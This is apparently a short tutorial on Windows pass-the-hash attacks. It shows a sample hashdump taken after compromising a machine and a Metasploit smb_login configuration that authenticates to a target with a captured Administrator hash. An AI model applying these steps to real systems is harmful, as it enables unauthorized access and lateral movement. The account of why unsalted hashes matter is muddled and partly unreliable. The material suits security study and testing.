PASS THE HASH ATTACK

Once a windows user creates a username and password, the password is hashed by two algorithms i.e LM (LAN MANAGER) which uses DES (data encryption standard) algorithm and the NTLM (NT lan manager).

The resultant hashes are concatenated to form one single hash file that is stored in the sam file. Once you have compromised one machine, you can leverage the hash information obtained by the hashdump utility.

The vulnerability in this whole process is that no salt is included in both the hashes, meaning every time a user tries to access a resource on a system and is sent a challenge by the system to authenticate using a user name and password, the password always hashes to the same value.

This is what amounts to pass the hash attack, using an already obtained hash to authenticate to another machine. Metasploit uploads a service exe, runs it using the SVC (service control manager) over SVCTL (MSRPC) interface and creates a meterpreter session.

Below is a sample of a hashdump gotten after gaining entry into a machine

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:dbc27187d546ea72dfa241defed3361a:7517b88643425fe598dae66626d24c89:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:db1d526d215b2926216796767ad47b7e:::
Terry:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

We can now use the username Administrator and the the password hash alongside it to access other resources.

Say we want to run the SMB(server message block) scanner which comes with metasploit, we just set the

msf auxiliary(smb_lookupsid) > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASS_FILE no File containing passwords, one per line
RHOSTS 10.0.0.250 yes The target address range or CIDR identifier
RPORT 445 yes Set the SMB service port
SMBDomain WORKGROUP no SMB Domain
SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 no SMB Password
SMBUser Administrator no SMB Username
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(smb_login) > run





Comments